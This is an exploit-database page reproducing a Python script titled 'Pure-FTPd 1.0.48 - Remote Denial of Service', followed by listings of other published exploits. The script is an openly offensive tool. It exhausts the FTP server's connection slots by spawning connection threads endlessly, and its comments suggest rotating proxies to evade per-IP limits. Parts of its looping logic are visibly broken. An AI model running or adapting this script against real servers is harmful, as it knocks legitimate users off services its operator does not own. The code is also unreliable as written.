Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Pure-FTPd 1.0.48 - Remote Denial of Service"

Author

Exploit author

xynmaps

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-11-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service
# Date: 2020. nov. 26., 09:32:17 CET
# Exploit Author: xynmaps
# Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/
# Software Link: https://github.com/jedisct1/pure-ftpd/
# Version: 1.0.48
# Tested on: Parrot Security OS 5.9.0

#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3.
"""
Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""

import socket
import sys
import threading
import subprocess
import time

banner = """
._________________.
|    Pure-FTPd    |
|      D o S      |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|

"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])

def test(t,p):
	s = socket.socket()
	s.settimeout(10)
	try:
		s.connect((t, p))
		response = s.recv(65535)
		s.close()
		return 0
	except socket.error:
		print("Port {} is not open, please specify a port that is open.".format(p))
		sys.exit()
def attack(targ, po, id):
	try:
		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
		#print("Worker {} running".format(id))
	except OSError: pass
def main():
	global target, port, start
	print banner
	try:
		target = sys.argv[1]
	except:
		print usage
		sys.exit()
	try:
		port = int(sys.argv[2])
	except:
		port = 21
	try:
		conns = int(sys.argv[3])
	except:
		conns = 50
	print("[!] Testing if {0}:{1} is open".format(target, port))
	test(target, port)
	print("[+] Port {} open, starting attack...".format(port))
	time.sleep(2)
	print("[+] Attack started on {0}:{1}!".format(target, port))
	def loop(target, port, conns):
		global start
		threading.Thread(target=timer).start()
		while 1:
			for i in range(1, conns + 3):
				t = threading.Thread(target=attack, args=(target,port,i,))
				t.start()
				if i > conns + 2:
					t.join()
					break
					loop()

	t = threading.Thread(target=loop, args=(target, port, conns,))
	t.start()

def timer():
        start = time.time()
        while 1:
                if start < time.time() + float(900): pass
                else:
                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                        t = threading.Thread(target=loop, args=(target, port,))
			t.start()
                        break

main()
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting" webapps multiple "Soushikta Chowdhury"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass" webapps multiple "Aakash Madaan"
Release Date Title Type Platform Author
2020-11-26 "Pure-FTPd 1.0.48 - Remote Denial of Service" dos multiple xynmaps
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49105/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.